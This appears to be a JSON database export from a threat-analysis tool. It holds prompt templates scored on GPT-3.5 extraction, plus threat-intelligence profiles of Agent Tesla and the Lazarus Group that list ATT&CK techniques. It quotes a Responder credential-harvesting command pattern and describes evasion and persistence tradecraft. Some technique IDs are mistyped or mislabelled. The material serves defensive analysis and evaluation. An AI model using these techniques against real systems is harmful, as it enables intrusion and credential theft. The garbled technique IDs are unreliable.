  "scores": {
    "score": 0.19506553585196607,
    "field_scores": {
      "aliases": 0.1875,
      "country_of_origin": 0,
      "threat_actor_motives": 0.2857142857142857,
      "threat_actor_intent": 0.1791044776119403,
      "threat_actor_capabilities": 0.2589928057553957,
      "threat_actor_resources": 0.1590909090909091,
      "threat_actor_type": 0.22413793103448276,
      "threat_actor_sophistication": 0,
      "target_countries": 0.27835051546391754,
      "target_regions": 0.12280701754385964,
      "target_populations": 0,
      "target_industry_sectors": 0.21739130434782608,
      "vulnerabilities": 0.4166666666666667
    },
    "model_tested": "GPT-3.5"
  }
},
{
  "_id": {
    "$oid": "65272240b94ac60f7aee7794"
  },
  "type": "threat-report",
  "name": "Self Identification",
  "description": "Broad prompts and self-identification",
  "group_id": "threat-analysis-self-identification",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-11T22:31:28.585Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.15897435897435896,
    "field_scores": {
      "aliases": 0.13636363636363635,
      "country_of_origin": 0,
      "threat_actor_motives": 0.2962962962962963,
      "threat_actor_intent": 0.15,
      "threat_actor_capabilities": 0.24879227053140096,
      "threat_actor_resources": 0.15789473684210525,
      "threat_actor_type": 0.18181818181818182,
      "threat_actor_sophistication": 0,
      "target_countries": 0.09243697478991597,
      "target_regions": 0.05454545454545454,
      "target_populations": 0,
      "target_industry_sectors": 0.2184873949579832,
      "vulnerabilities": 0.25
    },
    "model_tested": "GPT-3.5"
  }
},
{
  "_id": {
    "$oid": "65272240b94ac60f7aee7795"
  },
  "type": "threat-report",
  "name": "Broad Constraints",
  "description": "Includes self-identification, and broad constraints",
  "group_id": "threat-analysis-broad-constraints",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    }
  ],
  "added_on": {
    "$date": "2023-10-11T22:31:28.589Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.20667150108774474,
    "field_scores": {
      "aliases": 0.18181818181818182,
      "country_of_origin": 0,
      "threat_actor_motives": 0.3333333333333333,
      "threat_actor_intent": 0.16666666666666666,
      "threat_actor_capabilities": 0.3546099290780142,
      "threat_actor_resources": 0.18421052631578946,
      "threat_actor_type": 0.17777777777777778,
      "threat_actor_sophistication": 0,
      "target_countries": 0.10504201680672269,
      "target_regions": 0.05454545454545454,
      "target_populations": 0,
      "target_industry_sectors": 0.23140495867768596,
      "vulnerabilities": 0.5
    },
    "model_tested": "GPT-3.5"
  }
},
{
  "_id": {
    "$oid": "65272240b94ac60f7aee7796"
  },
  "type": "threat-report",
  "name": "Feature Context",
  "description": "Broad prompts and self-identification",
  "group_id": "threat-analysis-feature-context",
  "prompts": [
    {
      "text": "Task: extracting and summarizing data about multiple threat actors.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Input: 2023 cybersecurity threat report.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "If an attribute is absent, return null",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Make sure the output is strictly based on the provided information",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Don't invent data",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Do not invent a new key in the json specification",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Identify other names the threat actor is known by as listed in the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "aliases"
    },
    {
      "text": "Indicate the categorical level of resources a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_resources"
    },
    {
      "text": "Indicate the categorical type of threat actor based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_type"
    },
    {
      "text": "Estimate the categorical level of sophistication a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_sophistication"
    },
    {
      "text": "Only include vulnerabilities by referencing the CVEs specified in the report",
      "objective": "Guidance on which CVEs to use",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "Specify which industry sectors are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_industry_sectors"
    },
    {
      "text": "Specify which countries are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_countries"
    },
    {
      "text": "Specify which population categories are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_populations"
    },
    {
      "text": "Specify which geographical regions are targeted by the threat?",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_regions"
    },
    {
      "text": "Identify where the attacks likely originate from",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "country_of_origin"
    },
    {
      "text": "This is the tactical objective of the threat actor when attacking an entity",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_intent"
    },
    {
      "text": "Include MITRE ATT&CK technique identifiers used by the threat actor as identified in the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_capabilities"
    },
    {
      "text": "This is the underlying and longer-term objective of the threat actor",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_motives"
    }
  ],
  "added_on": {
    "$date": "2023-10-11T22:31:28.598Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.32554517133956384,
    "field_scores": {
      "aliases": 0.4,
      "country_of_origin": 0,
      "threat_actor_motives": 0.27692307692307694,
      "threat_actor_intent": 0.2894736842105263,
      "threat_actor_capabilities": 0.5448113207547169,
      "threat_actor_resources": 0.34782608695652173,
      "threat_actor_type": 0.35294117647058826,
      "threat_actor_sophistication": 0,
      "target_countries": 0.3118279569892473,
      "target_regions": 0.03636363636363636,
      "target_populations": 0,
      "target_industry_sectors": 0.232,
      "vulnerabilities": 0.5106382978723404
    },
    "model_tested": "GPT-3.5"
  }
},
{
  "_id": {
    "$oid": "65272240b94ac60f7aee7797"
  },
  "type": "threat-report",
  "name": "AI Improved Prompts",
  "description": "Includes feature context with improvements from GPT 4",
  "group_id": "threat-analysis-ai-improved",
  "prompts": [
    {
      "text": "Your task is to extract and summarize data about multiple threat actors from the provided information.",
      "objective": "Include multiple threat actors if necessary.",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "You're analyzing a cybersecurity threat report from the year 2023.",
      "objective": "Ensure only current data in specification",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "For any missing attribute in the report, return a value of 'null'.",
      "objective": "Avoid false data",
      "type": "instruction",
      "target_field": null
    },
    {
      "text": "Base your output strictly on the provided report. Do not make assumptions or inferences.",
      "objective": "Avoid spurious data",
      "type": "context",
      "target_field": null
    },
    {
      "text": "Avoid adding or inventing any data not present in the report.",
      "objective": "Avoid false data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "When providing output, do not introduce new keys that aren't part of the given JSON specification.",
      "objective": "Avoid inconsistent data",
      "type": "constraint",
      "target_field": null
    },
    {
      "text": "Extract any alternate names or pseudonyms the threat actor is recognized by in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "aliases"
    },
    {
      "text": "Based on the report, specify the resource level the threat actor possesses.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_resources"
    },
    {
      "text": "Classify the threat actor into a specific type or category, as indicated in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_type"
    },
    {
      "text": "This includes the categorical level of sophistication a threat actor is likely to have based on the report",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_sophistication"
    },
    {
      "text": "This includes the vulnerabilities associated with the threat actor using specific CVEs mentioned in the report.",
      "objective": "Guidance on which CVEs to use",
      "type": "instruction",
      "target_field": "vulnerabilities"
    },
    {
      "text": "This includes the specific industry sectors that are at risk or targeted by the threat actor.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_industry_sectors"
    },
    {
      "text": "Identify the countries that are explicitly targeted by the threat actor as mentioned in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_countries"
    },
    {
      "text": "Determine the specific human population categories mentioned in the report that are directly targeted by the threat actor.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_populations"
    },
    {
      "text": "Identify the distinct geographical regions highlighted in the report as being under the threat actor's focus.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "target_regions"
    },
    {
      "text": "Determine the country or countries from which the attacks are most likely originating.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "country_of_origin"
    },
    {
      "text": "This includes the tactical objectives of the threat actor when targeting entities, as stated in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_intent"
    },
    {
      "text": "This includes the specific MITRE ATT&CK techniques employed by the threat actor, as documented in the report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_capabilities"
    },
    {
      "text": "This includes the deeper, long-term objectives that drive the threat actor's actions, based on the provided report.",
      "objective": "Provide context",
      "type": "instruction",
      "target_field": "threat_actor_motives"
    }
  ],
  "added_on": {
    "$date": "2023-10-11T22:31:28.606Z"
  },
  "updated_on": null,
  "updated_by": null,
  "scores": {
    "score": 0.3058252427184466,
    "field_scores": {
      "aliases": 0.38636363636363635,
      "country_of_origin": 0,
      "threat_actor_motives": 0.32653061224489793,
      "threat_actor_intent": 0.1743119266055046,
      "threat_actor_capabilities": 0.5522041763341067,
      "threat_actor_resources": 0.3333333333333333,
      "threat_actor_type": 0.35294117647058826,
      "threat_actor_sophistication": 0,
      "target_countries": 0.18947368421052632,
      "target_regions": 0.018518518518518517,
      "target_populations": 0,
      "target_industry_sectors": 0.16806722689075632,
      "vulnerabilities": 0.4444444444444444
    },
    "model_tested": "GPT-3.5"
  }
}]

==> data/et-isac-db.Report-20231013.json <==
[{
  "_id": {
    "$oid": "64ee4c6c40262b24389e0e6c"
  },
  "name": "Android MMRat Malware",
  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/new-android-mmrat-malware-uses-protobuf-protocol-to-steal-your-data/",
  "website_title": "wwwbleepingcomputercom",
  "file_name": null,
  "file_size": null,
  "status": "FAILED TO EXTRACT",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-08-29T19:52:12.956Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-09-01T19:09:26.227Z"
  },
  "gcloud_request": null,
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 40, in webscrape_url\n    raise AppException(error_code=ReportErrorCodes.REPORT_CONTENT_EMPTY,\net_isac_common.utilities.exceptions.error_exceptions.AppException: Failed to find cyber related text to extract\n",
  "content": ""
},
{
  "_id": {
    "$oid": "64ef7c1b12576985d49887be"
  },
  "name": "Agent Tesla",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "AgentTesla.pdf",
  "file_size": "88 KB",
  "content": "Threat Group Overview: \n\nAgent Tesla (aka: AgenTesla, AgentTesla, and Negasteal) a type of malicious software known as a remote \naccess Trojan (RAT). It is designed to provide unauthorized access and control over infected computers \nremotely. Typically, Agent Tesla is used with the aim of stealing sensitive information, such as login \ncredentials, financial data, and personal information, from the compromised systems. It can also be used \nto target businesses through their employees \n\nSources: \n\nAny.run \n\nBleeping Computer \n\nMalpedia \n\nDark Reading \n\nMitre \n\nIntent: \n\nFrom Bleeping Computer: \n\nA very popular business email compromise (BEEC) scammers who use it to infect their victims to record \nkeystrokes and taking screenshots of compromised machines. \n\nIt can also steal victims clipboard contents, for collecting system information, and killing ant-malware \nand software analysis processes. \n\nFrom Dark Reading \n\nGain access to personal information due to phishing content \n\nUses a .NET-based downloader to pull chunks of base64-encoded, obfuscated code for the second stage \n(Pastebin is an example). These chunks are decoded and decrypted to the loader for the final stage. \n\nMotivation: \n\nAgent Tesla is a remote access Trojan (RAT) that shares similar motivations to other RATs. It employs \nphishing tactics, often utilizing malicious emails, to target individuals and companies. Its objective is to \n\n \n \n \n \n \n \n \n\fgain unauthorized access to sensitive information, including keystrokes and clipboard contents, with the \nintention of compromising personal data and potentially causing harm. \n\nTarget(s): \n\nFinancial institutions and government agencies are prime targets for Agent Teslas \n\nOpportunity: \n\nThis threat's most viable attack vector is its spearphishing capabilities. It is looking to compromise the \nsystems operating system and access private information. \n\nCapabilities (TTPs): \n\nInitial Access: \n\nSpearphishing Attaachment (T1566.001) \n\nExecution: \n\nExploitation for Client Execution (T1203) \n\nScheduled Task (T1053.005) \n\nMalicious File (T1204.002) \n\nWindows Management Instrumentation (T1047) \n\nPersistence: \n\nRegistry Run Keys / Startup Folder (T1547.001) \n\nScheduled Task (T1053.005) \n\n \n \n \n \n \n \n \n \n \n \n \n\fPrivilege Escalation: \n\nRegistry Run Keys / Startup folder (T1547.001) \n\nProcess Injection (T1055) \n\nProcess Hollowing (T1055.012) \n\nScheduled Task (T1053.005) \n\nDefense Evasion: \n\nDeobfuscate/Decode Files or Information (T1140) \n\nHidden Files (T1564.001) \n\nHidden Window (T1564.003) \n\nDisable or Modify Tools (T15632.001) \n\nModify Registry (T1112) \n\nObfuscated Files or Information (T1027) \n\nProcess Injection (T1055) \n\nProcess Hollowing (T1055.012) \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\fRegsvcs/Regasm (T1218.009) \n\nVirtualization/Sandbox Evasion (T1497) \n\nCredential Access: \n\nCredentials from Password Stores (T1555) \n\nCredentials from Web Browsers (T1555.003) \n\nKeylogging (T1056.001) \n\nCredentials in Files (T1552.001) \n\nCredentials in Registry (T1552.002) \n\nDiscovery: \n\nLocal Account (T1087.001) \n\nProcess Discovery (T1057) \n\nSystem Information Discovery (T1082) \n\nSystem Network Configuration Discovery (T1016) \n\nSystem Owner/User Discovery (T1033) \n\nSystem Time Discovery (T1124) \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\fVirtualization/Sandbox Evasion(T1497) \n\nCollection: \n\nArchive Collected Data (T1560) \n\nBrowser Session Hijacking (T1185) \n\nClipboard Data (T1115) \n\nKeylogging (T1056.001) \n\nScreen Capture (T1113) \n\nVideo Capture (T1125) \n\nCommand and Control: \n\nMail Protocols (T1071.003) \n\nWeb Protocols (T1071.001) \n\nIngress Tool Transfer (T1105) \n\nExfiltration: \n\nExfiltration Over Unencrypted Non-C2 Protocol (T1048.003) \n\nConsequences: \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\fIf an attack was successful, there would be loss sensitive information. Examples of this would include \nclassified documents, banking credentials, financial information, and other information along that line. \n\nIoCs (Behaviors): \n\nIndications of compromise would be unusual network traffic and activity, suspicious emails, and \ndetection of the malware through security tools. \n\nMitigation: \n\nKeep your software and systems up to date, develop and maintain a firewall, implement an email \nfiltering and spam system, monitor network activity, and develop a response plan if an attack ever does \nhappen. \n\nResources: \n\nIt is distributed on a website for anywhere between $15-$70 depending on what is needed. \n\nThreat Score: \n\n3 \n\n \n \n \n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-08-30T17:27:55.239Z"
  },
  "added_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64ef8595ae50e77b5ba6d3ef"
  },
  "name": "Lazarus (APT)",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Lazarus(APT).pdf",
  "file_size": "129 KB",
  "content": "Threat Group Overview: \n\nLazarus Group, a North Korean state-sponsored cyber threat group, has been active since 2009 and \ngained infamy for their involvement in major cyberattacks, including the destructive wiper attack on Sony \nPictures Entertainment in 2014. They have been associated with various campaigns such as Operation \nBlockbuster, Operation Flame, and DarkSeoul. While differentiating North Korean cyber groups can be \nchallenging, Lazarus Group has become a widely used term to encompass multiple groups. Initially \nfocused on cryptocurrency-related targets, Lazarus Group has now expanded their scope to target global \norganizations, developing sophisticated malware and techniques to evade detection. The implications of \ntheir activities include financial losses, national security concerns, and the need for international \ncollaboration to address this evolving cyber threat. \n\nSources: \n\nBank Info Security \n\nBleepingComputer \n\nCyberWire \n\nDarkReading \n\nInfoSecurity Magazine \n\nMITRE ATT&CK \n\nSC Media \n\nIntent: \n\nFrom BankInfoSecurity: \n\nThis discovery in an example of the Lazarus Group's agility in swiftly crafting fresh malware to target \nglobal organizations. \n\nFrom BleepingComputer: \n\n \n \n \n \n \n \n \n \n \n\fAndariel (aka Stonefly) is believed to be part of the Lazarus hacking group known for employing the \nDTrack modular backdoor to collect information from compromised systems, such as browsing history, \ntyped data (keylogging), screenshots, running processes, and more. \n\nFrom DarkReading: \n\nIn 2022, for example, the group leveraged the Log4j crisis to deploy its DTrack backdoor and other post-\nexploitation malware onto networks belonging to organizations in the field of scientific research: \nbiomedical, genetics, soil sciences, and energy. \n\nMore recently, in a campaign that ended this January, the group weaponized a backdoored client for the \nopen source remote administration tool UltraVNC. Its zombified UltraVNC might have seemed to operate \nnormally on the surface, while it covertly exfiltrated data about the host computer and downloaded to it \na brand-new version of Blindincan. \n\nBlindincan is a remote access Trojan that enables Lazarus to read, write, and delete files (among other \nthings), retrieve information about a host's OS and disks, and more. The newest version introduced plug-\nins to expand upon the original's functionality. \n\nAnalysis of the January 2023 campaign suggested that Blindincan was deployed against organizations in \nthe manufacturing and real estate sectors in India and telecommunications companies in Pakistan and \nBulgaria. \n\nFrom SC Media: \n\nReuters reports that Atomic Wallet had more than $100 million stolen by the North Korean state-\nsponsored threat operation Lazarus Group in a cryptocurrency heist earlier this month. North Korea has \nalso not provided comment on the Atomic Wallet attack but the country was reported by the United \nNations to have had the most lucrative cryptocurrency asset theft haul last year, with the proceeds noted \nby international monitors to have been used to support its nuclear weapons program. \n\nMotivation: \n\nFinancial Gain \n\nPolitical Gain \n\n \n \n \n \n \n \n \n \n\fCyber warfare \n\nTarget(s): \n\nPublic/Private Businesses \n\nGovernments \n\nCritical Infrastructure \n\nOpportunity: \n\nSpear-Phishing \n\nBackdoor Vulnerabilities \n\nCompromised Webservices \n\nNetwork Vulnerabilities \n\nDrive-by compromise \n\nCompromised user accounts \n\nCapabilities (TTPs): \n\nBelow is a comprehensive list of TTPs utilized by Lazarus Group from previous and current campaigns. \n\nReconnaissance: \n\nGather Victim Identity Information (T1589): \n\nLazarus Group collected email addresses belonging to various departments of a targeted organization \nwhich were used in follow-on phishing campaigns. \n\n \n \n \n \n \n \n \n \n \n \n \n\fGather Victim Org Information (T1591): \n\nLazarus Group has studied publicly available information about a targeted organization to tailor \nSpearphishing efforts against specific departments and/or individuals. \n\nFor Operation Dream Job, Lazarus Group gathered victim organization information to identify specific \ntargets. \n\nSocial Media (T1593.001): \n\nFor Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen \norganization. \n\nResource Development: \n\nAcquire Infrastructure (T1583): \n\nLazarus acquired infrastructure information to develop their resources. \n\nCompromise Infrastructure (T1584v): \n\nLazarus compromised their victims infrastructure to take control of the attack. \n\nCode Signing Certificates (T1587.002): \n\nLazarus digitally signed their malware. \n\nMalware (T1587.001): \n\nLazarus developed custom malware to achieve their desired results from their campaigns. \n\nEstablish Accounts (T1585): \n\nLazarus established email and social media accounts to match their victims to execute phishing attempts. \n\nStage Capabilities (T1608): \n\nOnce access to a compromised system is gained, Lazarus uploads their malware and tools. \n\n \n \n \n \n \n \n \n \n \n\fInitial Access: \n\nDrive-by Compromise (T1189): \n\nLazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate \nwebsite. \n\nPhishing (T1566): \n\nLazarus utilized a variety of phishing techniques to compromise their victims. \n\nValid Accounts (T1078): \n\nLazarus used compromised credentials to legitimate accounts to compromise systems. \n\nExecution: \n\nCommand and Scripting Interpreter (T1059): \n\nLazarus utilized PowerShell, Visual Basic, and Windows Command Shell to execute payloads. \n\nExploitation for Client Execution (T1203): \n\nLazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution. \n\nNative API (T1106): \n\nLazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a \ncompromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, \nfunctions to perform various types of Discovery and Process Injection. \n\nScheduled Task (T1053.005): \n\nLazarus Group has used schtasks for persistence including through the periodic execution of a remote \nXSL script or a dropped VBS payload. \n\nUser Execution (T1204): \n\nLazarus attempted to lure users to launch compromised attachments, files, or links. \n\n \n \n \n \n \n \n \n \n\f###Windows Management Instrumentation (T1047): \n\nLazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral \nmovement. \n\nPersistence: \n\nAccount Manipulation (T1098): \n\nLazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the \nadministrators account. \n\nRegistry Run Keys / Startup Folder (T1547.001): \n\nLazarus used registry run keys and the startup folder to allow their payloads to persist. \n\nShortcut Modification (T1547.009): \n\nLazarus maintained persistence for their malware by creating a LNK file in the startup folder. \n\nWindows Service (T1543.003): \n\nLazarus malware families install themselves as new service. \n\nDLL Side-Loading (T1574.002): \n\nLazarus Group has replaced win_fw.dll, an internal component that is executed during IDA Pro \ninstallation, with a malicious DLL to download and execute a payload. \n\nKernelCallbackTable (T1574.013): \n\nLazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode. \n\nBootkit (T1542.003): \n\nLazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure \nthat the malware will persist even if a victim machine shuts down. \n\n \n \n \n \n \n \n \n \n \n\fScheduled Task (T1053.005): \n\nLazarus Group has used schtasks for persistence including through the periodic execution of a remote \nXSL script or a dropped VBS payload. \n\nIIS Components (T1505.004): \n\nDuring Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information \nSystems (IIS) to install C2 components. \n\nPrivilege Escalation: \n\nCreate Process with Token (T1134.002): \n\nLazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API \ncall CreateProcessAsUserA under that user's context. \n\nDynamic-link Library Injection (T1055.001): \n\nA Lazarus Group malware sample performs reflective DLL injection. \n\nDefense Evasion: \n\nHidden Files and Directories (T1564.001): \n\nLazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files \nwith a dot prefix to hide them from the Finder application. \n\nDisable or Modify System Firewall (T1562.004): \n\nVarious Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable \nit entirely using netsh. \n\nDisable or Modify Tools (T1562.001): \n\nLazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. \nAdditionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event \nNotification and Alerter services. \n\n \n \n \n \n \n \n \n \n\fClear Command History (T1070.003): \n\nLazarus Group has routinely deleted log files on a compromised router, including automatic log deletion \nthrough the use of the logrotate utility. \n\nFile Deletion (T1070.004): \n\nLazarus Group malware has deleted files in various ways, including \"suicide scripts\" to delete malware \nbinaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim. \n\nTimestomp (T1070.006): \n\nSeveral Lazarus Group malware families use timestomping, including modifying the last write timestamp \nof a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files \n(such as calc.exe or mspaint.exe) to its dropped files. \n\nMasquerading (T1036): \n\nLazarus malware masked its malicious processes with legitimate ones. \n\nObfuscated Files or Information (T1027): \n\nLazarus obfuscated their malware via multiple types of encryptions, software packing and Dynamic API \nResolution. System Binary Proxy Execution (T1218): \n\nLazarus Group lnk files used for persistence have abused the Windows Update Client (wuauclt.exe) to \nexecute a malicious DLL. This included the following sub-techniques: Mshta, Regsvr32, and Rundll32. \n\nTemplate Injection (T1221): \n\nDuring Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document \ntemplate/DOTM file. \n\nVirtualization/Sandbox Evasion (T1497): \n\nTo avoid analysis, Lazarus malware utilizes System Checks (T1597.001), and Time Based Evasion \n(T1497.003). \n\n###XSL Script Processing (T1220): \n\n \n \n \n \n \n \n \n \n\fDuring Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded \nDLL custom downloader. \n\nCredential Access: \n\nLLMNR/NBT-NS Poisoning and SMB Relay (T1557.001): \n\nLazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a \ncompromised host to harvest credentials and move laterally. \n\nPassword Spraying (T1110.003): \n\nLazarus Group malware attempts to connect to Windows shares for lateral movement by using a \ngenerated list of usernames, which center around permutations of the username Administrator, and \nweak passwords. \n\nDiscovery: \n\nDomain Account (T1087.002): \n\nDuring Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to \nobtain the list of employees including administrator accounts. \n\nApplication Window Discovery (T1010): \n\nLazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each \nrunning process. The KilaAlfa keylogger also reports the title of the window in the foreground. \n\nDebugger Evasion (T1622): \n\nDuring Operation Dream Job, Lazarus Group used tools that used the IsDebuggerPresent call to detect \ndebuggers. \n\nFile and Directory Discovery (T1083): \n\nLazarus Group malware can use a common function to identify target files by their extension, and some \nalso enumerate files and directories, including a Destover-like variant that lists files and gathers \ninformation for all drives. \n\n \n \n \n \n \n \n \n \n\fNetwork Service Discovery (T1046): \n\nLazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment \nof an enterprise network. \n\nProcess Discovery (T1057): \n\nSeveral Lazarus Group malware families gather a list of running processes on a victim system and send it \nto their C2 server. A Destover-like variant used by Lazarus Group also gathers process times. \n\nQuery Registry (T1012): \n\nLazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain \napplications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, \nmRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware \nsample checks for the presence of the following Registry \nkey:HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt. \n\nSystem Information Discovery (T1082): \n\nLazarus Group searched for system information, including System Language (T1614.001), System \nNetwork Configuration (T1016), System Network Connections (T1049), System Owner/User (T1033), \nSystem Time (T1124). \n\nLateral Movement: \n\nInternal Spearphishing (T1534): \n\nDuring Operation Dream Job, Lazarus Group conducted internal Spearphishing from within a \ncompromised organization. \n\nRemote Desktop Protocol (T1021.001): \n\nLazarus Group malware SierraCharlie uses RDP for propagation. \n\nSMB/Windows Admin Shares (T1021.002): \n\nLazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement. \n\nSSH (T1021.004): \n\n \n \n \n \n \n \n \n\fLazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a \ncompromised network. \n\nCollection: \n\nArchive Collected Data (T1560): \n\nLazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive \nspecified directories in .zip format, encrypt the .zip file, and upload it to C2. \n\nData From Local System (T1005): \n\nLazarus Group has collected data and files from compromised networks. \n\nLocal Data Staging (T1074): \n\nLazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in \nthe %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server. \n\nKeylogging (T1056.001): \n\nLazarus Group malware KiloAlfa contains keylogging functionality. \n\nCommand and Control: \n\nWeb Protocols (T1071.001): \n\nLazarus Group has conducted C2 over HTTP and HTTPS. \n\nStandard Encoding (T1132.001): \n\nA Lazarus Group malware sample encodes data with base64. \n\nProtocol Impersonation (T1001.003): \n\nLazarus Group malware also uses a unique form of communication encryption known as FakeTLS that \nmimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption. \n\nSymmetric Cryptography (T1573.001): \n\n \n \n \n \n \n \n \n \n\fSeveral Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD \noperation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other \nLazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used \nAES to encrypt C2 traffic. \n\nFallback Channels (T1008): \n\nLazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, \nand if the transmission fails, chooses a new C2 server to attempt the transmission again. \n\nIngress Tool Transfer (T1105): \n\nLazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host. \n\nMulti-Stage Channels (T1104): \n\nLazarus Group has used multi-stage malware components that inject later stages into separate \nprocesses. 